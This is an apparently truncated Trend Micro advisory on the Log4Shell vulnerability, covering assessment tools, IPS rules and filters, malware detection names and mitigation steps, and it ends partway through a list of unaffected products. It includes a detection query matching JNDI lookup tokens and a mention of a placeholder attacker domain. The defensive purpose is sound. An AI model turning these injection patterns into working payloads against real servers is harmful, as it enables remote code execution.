Trend Micro Log4Shell Vulnerability Assessment ToolTrend Micro also has created a free assessment tool that can quickly identify endpoints and server applications that may have Log4j using the power of Trend Micro Vision One.This quick and easy self-serve security assessment tool leverages complimentary access to the Trend Micro Vision One threat defense platform, so you can identify endpoints and server applications that may be affected by Log4Shell. The assessment instantly provides a detailed view of your attack surface and shares next steps to mitigate risks.
Please note, if you are already a Trend Micro Vision One customer, you do not need to complete the form. Simply log into your console and you will be provided instructions to complete the assessment of your exposure.
Trend Micro Vision One™
Trend Micro Vision One customers benefit from XDR detection capabilities of the underlying products such as Apex One. In addition, depending on their data collection time range, Trend Micro Vision One customers may be able to sweep for IOCs retrospectively to identify if there was potential activity in this range to help in investigation.
Vision One Threat Intelligence Sweeping
Indicators for exploits associated with this vulnerability are now included in the Threat Intelligence Sweeping function of Trend Micro Vision One. Customers who have this enabled will now have the presence of the IOCs related to these threats added to their daily telemetry scans.
The first sweep, “Vulnerable version of log4j….” is slightly different than the others in that instead of specific IOCs, it is looking for specific instances of log4j libraries on systems which can help a customer narrow down or give additional insights on potentially vulnerable systems.
The results of the intelligence scans will populate in the WorkBench section of Vision One (as well as the sweep history of each unfolded threat intelligence report).
Please note that customers may also manually initiate a scan at any time by clicking the 3 dots at the right of a rule and selecting the “Start Sweeping” option.
Vision One Search Queries for Deep Security Deep Packet Inspection
Customers who have Trend Micro Cloud One – Workload Security or Deep Security may utilize the following search query to identify hosts and then additional queries can be made with a narrowed timeframe on those hosts as additional information is learned about exploits.
eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1005177) AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))
Trend Micro Cloud One™ – Conformity
Trend Micro Cloud One – Conformity allows gives customers central visibility and real-time monitoring of their cloud infrastructure by enabling administrators to auto-check against nearly 1000 cloud service configuration best practices across 90+ services and avoid cloud service misconfigurations.
The following rules are available to all Trend Micro Cloud One – Conformity customers that may help provide more insight to customers looking to isolate affected machines (more information can be found here for rule configuration):
Lambda-001 : identifies all Lambdas that are running Java which may be vulnerable.
Unrestricted Security Group Egress (EC2-033) : identifies security groups that may be associated with, for example, an EC2 that may be compromised and then has the ability to communicated externally.
Preventative Rules, Filters & Detection
A demo video of how Trend Micro Cloud One can help with this vulnerability can be found at: https://youtu.be/CorEsXv3Trc.
Trend Micro Cloud One – Workload Security and Deep Security IPS Rules
Rule 1008610 – Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request
Rule 1008610 is a SMART rule that can be manually assigned to assist in protection/detection against suspicious activity that may be associated with this threat. This is not a comprehensive replacement for the vendor’s patch.
Please also note that rule 1008610 is shipped in DETECT, and must be manually changed to PREVENT if the administrator wishes to apply this. Also, please be aware that due to the nature of this rule, there may be False Positives in certain environments, so environment-specific testing is recommended.
Rule 1011249 – Apache Log4j Denial of Service Vulnerability (protects against CVE-2021-45105)
Trend Micro Cloud One – Workload Security and Deep Security Log Inspection
Rule 4643: POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT – HTTP (REQUEST) – Variant 2
Trend Micro Cloud One – Network Security and TippingPoint Recommended Actions
Filter 40627 : HTTP: JNDI Injection in HTTP Header or URI
This was released in Digital Vaccine #9621 and has replaced CSW C1000001 that was previously released.
Trend Micro recommends customers enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, Trend Micro strongly recommends you confirm the filter is enabled in your policy.
What other controls can be used to disrupt the attack?
This attack is successful when the exploit is used to initiate a transfer of a malicious attack payload. In addition to the filter above, these techniques can help disrupt that chain:
Geolocation filtering can be used to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable.
For TippingPoint IPS, TPS, and vTPS products Trend Micro also recommends enabling DNS and URL reputation as a proactive means of securing an environment from this vulnerability. Leveraging Trend Micro’s rapidly evolving threat intelligence, TippingPoint appliances can help disrupt the chain of attack destined to known malicious hosts.
Additionally, Reputation filtering can be leveraged to block Anonymous proxies that are commonly used in exploit attempts. Any inbound or outbound connections to/from an anonymous proxy or anonymizer service can be blocked by configuring a reputation filter with “Reputation DV Exploit Type” set to “Tor Exit” to a Block action.
For Cloud One – Network Security Anonymous proxies are also an independent, configurable “region” that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts.
Domain filtering can also be used to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker’s domain, e.g. http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of IPS filter policy.
Trend Micro Malware Detection Patterns (VSAPI, Predictive Learning, Behavioral Monitoring and WRS) for Endpoint, Servers, Mail & Gateway (e.g. Apex One, Worry-Free Business Security Services, Worry-Free Business Security Standard/Advanced, Deep Security w/Anti-malware, etc.)
Web Reputation (WRS): Trend Micro has added over 1700 URLs (and growing) to its WRS database to block that are linked to malicious reporting and communication vectors associated with observed exploits against this vulnerability.
Ransomware Detection – there have been observations about a major ransomware campaign (Khonsari) being utilized in attacks and Trend Micro detects components related to this as Ransom.MSIL.KHONSARI.YXBLN.
VSAPI (Pattern) Detections: the following detections have been released in the latest OPR for malicious code associated with exploits –
Trojan.Linux.MIRAI.SEMR
HS_MIRAI.SMF
HS_MIRAI.SME
Trojan.SH.CVE20207961.SM
Backdoor.Linux.MIRAI.SEMR
Trojan.SH.MIRAI.MKF
Coinminer.Linux.KINSING.D
Trojan.FRS.VSNTLB21
Trojan.SH.MALXMR.UWELI
Backdoor.SH.KIRABASH.YXBLL
Backdoor.Linux.MIRAI.SMMR1
Coinminer.SH.MALXMR.UWEKG
Coinminer.Linux.MALXMR.SMDSL64
Backdoor.Linux.GAFGYT.SMMR3
Coinminer.Win64.MALXMR.TIAOODGY
Rootkit.Linux.PROCHID.B
ELF_SETAG.SM
Backdoor.Linux.TSUNAMI.AMZ
Coinminer.PS1.MALXMR.PFAIQ
Trojan.SH.TSUNAMI.A
Trojan.PS1.METERPRETER.E
Coinminer.Linux.MALXRMR.PUWENN
Trend Micro Cloud One – Application Security
Trend Micro Cloud One – Application Security can monitor a running application and stop unexpected shell commands from executing. The product’s RCE configuration can be adjusted to help protect against certain exploits associated with this vulnerability using the following steps:
Log into Trend Micro Cloud One and navigate to Application Security.
Select “Group;s Policy” in the left-hand menu and find your application’s Group.
Enable “Remote Command Execution” if not already enabled.
Click the hamburger icon for “Configure Policy” and then click the ” < INSERT RULE > ” icon.
Input (?s).*in the “Enter a pattern to match” field and hit “Submit” and “Save Changes.”
Double-check that “Mitigate” is selected in your “Remote Command Execution” line item.
Trend Micro Cloud One – Open Source Security by Snyk
Trend Micro Cloud One – Open Source Security by Snyk can identify vulnerable versions of the log4j library across all organization source code repositories with very little integration effort. Once installed, it can also monitor progress on updating to non-vulnerable versions.
Trend Micro is continuing to actively research the potential exploits and behavior around this vulnerability and is actively looking for malicious code that may be associated with any exploit attempts against the vulnerability and will be adding additional detection and/or protection as they become available.
–
Impact on Trend Micro Products
Trend Micro is currently doing a product/service-wide assessment to see if any products or services may be affected by this vulnerability. Products will be added to the lists below as they are validated.
Products Confirmed Not Affected (Including SaaS Solutions that have been patched):
5G Mobile Network Security
Not Affected
ActiveUpdate
Not Affected
Apex Central (including as a Service)
Not Affected
Apex One (all versions including SaaS, Mac, and Edge Relay))
